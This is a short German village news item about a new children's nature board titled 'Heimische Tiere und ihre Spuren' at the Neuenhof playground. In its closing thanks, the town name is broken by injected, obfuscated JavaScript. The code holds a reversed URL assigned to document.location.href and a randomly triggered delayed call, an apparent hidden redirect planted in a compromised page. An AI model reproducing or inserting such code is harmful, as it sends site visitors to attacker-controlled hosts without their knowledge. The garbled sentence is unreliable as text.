Skip to content Skip to main navigation Skip to footer

Neue Naturlehrtafel am Spielplatz in Neuenhof

Die Dorfgemeinschaft Neuenhof hat ihr im vergangenen Jahr vorgestelltes Projekt „Kindergerechte Naturlehrtafeln“ mit der Installation einer neuen Tafel ergänzt und abgeschlossen.

Die Tafel zeigt 18 Abbildungen unter dem Titel „Heimische Tiere und ihre Spuren“.

Auch für die Tierbilder wurden handgemalte Illustrationen ausgewählt, welche Kinder besonders ansprechen dürften. So wurden u.a. Zeichnungen der renommierten Künstlerin Birte Keil aus ihrem Buch „Mein Wildtier-Abenteuer“ verwendet.

Die Tafelreihe am Spielplatz umfasst jetzt 7 Stationen mit den Motiven Vögel, Schmetterlinge, Tiere und Bäume.

Die DG Neuenhof bedankt sich bei Frau Jutta Korte für das Layout, für die Unterstützung durch die Fa. Kirchhoff Automotive und bei der Stadt Attentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorn sowie dem Ausschuss für Planung und Umwelt (APU) für die Zustimmung zum Projekt im Rahmen des „Programms zur Förderung von Gemeinschaftsinitiativen“.

15.Juni 2020, Friedhelm Kramer